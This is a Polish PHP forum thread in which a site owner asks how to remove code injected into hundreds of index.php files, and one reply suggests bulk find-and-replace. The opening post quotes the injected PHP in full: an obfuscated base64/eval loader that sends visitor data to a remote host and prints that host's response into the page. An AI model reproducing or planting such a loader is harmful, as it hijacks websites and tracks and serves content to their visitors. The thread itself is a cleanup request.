Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [PHP]wyszukiwanie określonego kodu w wielu plikach php, jak i czym?
kamil9012
post
Post #1





Grupa: Zarejestrowani
Postów: 71
Pomógł: 0
Dołączył: 7.02.2008

Ostrzeżenie: (0%)
-----

Witam.
Dzisiaj moje strony chyba zaatakował wirus. Dodawał tylko do plików index.php taki kod PHP:
[PHP] pobierz, plaintext 
  1. <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIz
    NDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpO
    yRfUj0wOyRfWD0wOw=='    ));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[PHP] pobierz, plaintext


Niestety na moim serwerze jest kilkaset plików o nazwie index.php żebym mógł ręcznie w nich szukać powyższego kodu i go usuwać.

Czy macie może pomysł w jaki sposób lub jakim programem mógłbym przeszukać pliki php w poszukiwaniu powyżeszgo kodu lub jego usunięcie?

Jeżeli ktoś z Was spotkał się z podobnym problemem to proszę o info jak temu zapobiegać.

Z góry dzięki i oczywiście plusik dla pomagających.

Ten post edytował kamil9012 13.10.2011, 20:43:45
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
pifarek
post
Post #2





Grupa: Zarejestrowani
Postów: 91
Pomógł: 15
Dołączył: 3.03.2009
Skąd: Włocławek

Ostrzeżenie: (0%)
-----

Notepad++ może chyba szukać w plikach w podanym folderze i zamieniać (w tym przypadku na nic).
Go to the top of the page
+Quote Post

Posty w temacie
- kamil9012   [PHP]wyszukiwanie określonego kodu w wielu plikach php, jak i czym?   13.10.2011, 20:40:06
- - Piogola   Cytat(kamil9012 @ 13.10.2011, 21:40:0...   13.10.2011, 20:59:23
- - pifarek   Notepad++ może chyba szukać w plikach w podanym fo...   13.10.2011, 21:22:47
|- - kamil9012   Cytat(pifarek @ 13.10.2011, 22:22:47 ...   21.10.2011, 16:04:49
- - Mackos   Dlaczego na nic? Jeśli ustawi żeby zamieniał tekst...   13.10.2011, 21:27:30
- - kamil9012   Jeszcze mi się nie udało. Pobieram właśnie pliki z...   13.10.2011, 23:47:51
- - Mackos   Wirus raczej nie jest satysfakcjonującą odpowiedzi...   14.10.2011, 09:18:57
- - by_ikar   A po co komu dodatkowe programy, skoro win7 równie...   14.10.2011, 10:28:53
- - kamil9012   Cytat(Mackos @ 14.10.2011, 10:18:57 )...   14.10.2011, 10:42:33
- - by_ikar   Taki IP nie, ale on jest później przerabiany na ta...   14.10.2011, 11:03:16
- - Mackos   Diagnoza: Masz dziurawy skrypt, i zaliczyłeś włam ...   14.10.2011, 12:56:52

« Następny starszy · Przedszkole · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 26.09.2025 - 00:53
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn